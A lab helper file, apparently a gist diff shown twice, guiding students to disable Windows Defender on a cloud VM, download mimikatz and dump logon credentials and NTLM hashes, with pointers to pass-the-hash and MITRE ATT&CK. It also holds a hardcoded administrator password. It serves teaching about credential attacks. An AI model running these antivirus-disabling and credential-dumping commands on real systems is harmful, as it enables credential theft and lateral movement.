codingoutloud · December 16, 2023 15:43
diff --git a/mimikatz-lab-helpers.txt b/mimikatz-lab-helpers.txt
 # For educational purposes only

 ## STEP 0 - Create a Windows VM in the cloud, such as a Windows 2016 Server in Azure, with RDP enabled

 Log in via RDP

 Open PowerShell as Administrator

 if you want to download local PowerShell help to poke around:
 Get-Help curl

 the curl command is familiar to many, but is really an alias in PowerShell:
 alias curl

 Will probably want this:
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12


 ## STEP 1 - Defeat Windows Antimalware on Windows Server

 This is syntactically correct, but doesn't succeed if you have antivirus software runnning:
 curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip 

 ## don't think this works! try explicit path
 Add-MpPreference -ExclusionPath .
 Set-MpPreference -ExclusionPath C:\Users\mimikatz # YOUR PATH MUST GO IN

 Get-MpComputerStatus 

 Get-MpComputerStatus | select RealTimeProtectionEnabled
 Set-MpPreference -DisableRealtimeMonitoring $true
 Get-MpComputerStatus | select RealTimeProtectionEnabled

 # Nuclear option if more surgical above does not work
 # By be more valuable on other operating systems or versions 
 Uninstall-WindowsFeature -Name Windows-Defender # nuclear option
 Restart-Computer

 ## STEP 2 - DOWNLOAD and UNZIP MIMIKATZ

 # The link you want to download for this lab is a pre-built zip file - to find latest, go here:
 #    https://github.com/gentilkiwi/mimikatz/releases
 # and then search for 
 #    mimikatz_trunk.zip
 # The full-path link to mimikatz_trunk.zip is what you want. As of this update (Nov 2023) here's the full-path link:
 #    https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip

 # adjust to latest download file from https://github.com/gentilkiwi/mimikatz/releases
 curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip 

 Unblock-File .\mm.zip
 Expand-Archive .\mm.zip

 ## STEP 3 - Use Mimikatz

 cd mimi
 cd x64
 .\mimikatz.exe

 .\mimikatz.exe "sekurlsa::logonpasswords" "exit"
 .\mimikatz.exe "sekurlsa::logonpasswords" "exit" | Select-String "NTLM"

 consider start .\mimikatz.exe

 ?
 hostname
 answer
 vault::list

 log hack.log
 privilege::debug
 sekurlsa::logonpasswords

 ## STEP 4 - Stuff we don't cover

 Learn more about mimikatz here:
 https://github.com/gentilkiwi/mimikatz/
 or on YouTube

 Use the captured NTLM hash with the known "pass the hash" exploit

 ## MISC

 Generate a 32 char password from Azure Cloud Shell bash command line:
 openssl rand -base64 32
 openssl rand 200 | tr -dc '!@#$%^._A-Z-a-z-0-9' | cut -c '1-32'

 NTLM hash generators (you give a password, it produces NTLM hash)
 --> I can't vouch for any of these so please use one of the above password generators to create a random one for this purpose - don't give it your real one, or at least change it right after if you do (and never use it again)

 https://codebeautify.org/ntlm-hash-generator
 https://www.ipvoid.com/ntlm-generator/
 https://www.browserling.com/tools/ntlm-hash

 Reset password on Windows Server VM (not in domain) from command line (because copy/paste into the password reset box may not work)

 net user administrateur "t/C7Wp3OJ+Sfg2WkadfxZ5weyvJ/v9J0CsOHQfUg+sQ="

 Here is more info about WHY the Mimikatz NTLM hash discovery is so powerful:

 1. Use Alternate Authentication Material: Pass the Hash, Sub-technique T1550.002 - Enterprise | MITRE ATT&CK®
 https://attack.mitre.org/techniques/T1550/002/

 2. Credentials from Password Stores, Technique T1555 - Enterprise | MITRE ATT&CK®
 https://attack.mitre.org/techniques/T1555/

 3. The MITRE ATT&CK Framework: Credential Access | Tripwire
 https://www.tripwire.com/state-of-security/the-mitre-attck-framework-credential-access#:~:text=The%20goal%20here%20is%20making%20password%20cracking%20difficult,time%20it%20would%20take%20to%20crack%20the%20password.

 The first one above is about the famous “pass the hash” hack which can allow for “lateral movement” (https://attack.mitre.org/tactics/TA0008/) once you’ve breached one VM.

 The second is about accessing password stores generally, and the third explains why you want passwords to be HARD TO REVERSE (“The goal here is making password cracking difficult for attackers”).
	# For educational purposes only

	## STEP 0 - Create a Windows VM in the cloud, such as a Windows 2016 Server in Azure, with RDP enabled

	Log in via RDP

	Open PowerShell as Administrator

	if you want to download local PowerShell help to poke around:
	Get-Help curl

	the curl command is familiar to many, but is really an alias in PowerShell:
	alias curl

	Will probably want this:
	[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12


	## STEP 1 - Defeat Windows Antimalware on Windows Server

	This is syntactically correct, but doesn't succeed if you have antivirus software runnning:
	curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip

	## don't think this works! try explicit path
	Add-MpPreference -ExclusionPath .
	Set-MpPreference -ExclusionPath C:\Users\mimikatz # YOUR PATH MUST GO IN

	Get-MpComputerStatus

	Get-MpComputerStatus \| select RealTimeProtectionEnabled
	Set-MpPreference -DisableRealtimeMonitoring $true
	Get-MpComputerStatus \| select RealTimeProtectionEnabled

	# Nuclear option if more surgical above does not work
	# By be more valuable on other operating systems or versions
	Uninstall-WindowsFeature -Name Windows-Defender # nuclear option
	Restart-Computer

	## STEP 2 - DOWNLOAD and UNZIP MIMIKATZ

	# The link you want to download for this lab is a pre-built zip file - to find latest, go here:
	# https://github.com/gentilkiwi/mimikatz/releases
	# and then search for
	# mimikatz_trunk.zip
	# The full-path link to mimikatz_trunk.zip is what you want. As of this update (Nov 2023) here's the full-path link:
	# https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip

	# adjust to latest download file from https://github.com/gentilkiwi/mimikatz/releases
	curl https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mm.zip

	Unblock-File .\mm.zip
	Expand-Archive .\mm.zip

	## STEP 3 - Use Mimikatz

	cd mimi
	cd x64
	.\mimikatz.exe

	.\mimikatz.exe "sekurlsa::logonpasswords" "exit"
	.\mimikatz.exe "sekurlsa::logonpasswords" "exit" \| Select-String "NTLM"

	consider start .\mimikatz.exe

	?
	hostname
	answer
	vault::list

	log hack.log
	privilege::debug
	sekurlsa::logonpasswords

	## STEP 4 - Stuff we don't cover

	Learn more about mimikatz here:
	https://github.com/gentilkiwi/mimikatz/
	or on YouTube

	Use the captured NTLM hash with the known "pass the hash" exploit

	## MISC

	Generate a 32 char password from Azure Cloud Shell bash command line:
	openssl rand -base64 32
	openssl rand 200 \| tr -dc '!@#$%^._A-Z-a-z-0-9' \| cut -c '1-32'

	NTLM hash generators (you give a password, it produces NTLM hash)
	--> I can't vouch for any of these so please use one of the above password generators to create a random one for this purpose - don't give it your real one, or at least change it right after if you do (and never use it again)

	https://codebeautify.org/ntlm-hash-generator
	https://www.ipvoid.com/ntlm-generator/
	https://www.browserling.com/tools/ntlm-hash

	Reset password on Windows Server VM (not in domain) from command line (because copy/paste into the password reset box may not work)

	net user administrateur "t/C7Wp3OJ+Sfg2WkadfxZ5weyvJ/v9J0CsOHQfUg+sQ="

	Here is more info about WHY the Mimikatz NTLM hash discovery is so powerful:

	1. Use Alternate Authentication Material: Pass the Hash, Sub-technique T1550.002 - Enterprise \| MITRE ATT&CK®
	https://attack.mitre.org/techniques/T1550/002/

	2. Credentials from Password Stores, Technique T1555 - Enterprise \| MITRE ATT&CK®
	https://attack.mitre.org/techniques/T1555/

	3. The MITRE ATT&CK Framework: Credential Access \| Tripwire
	https://www.tripwire.com/state-of-security/the-mitre-attck-framework-credential-access#:~:text=The%20goal%20here%20is%20making%20password%20cracking%20difficult,time%20it%20would%20take%20to%20crack%20the%20password.

	The first one above is about the famous “pass the hash” hack which can allow for “lateral movement” (https://attack.mitre.org/tactics/TA0008/) once you’ve breached one VM.

	The second is about accessing password stores generally, and the third explains why you want passwords to be HARD TO REVERSE (“The goal here is making password cracking difficult for attackers”).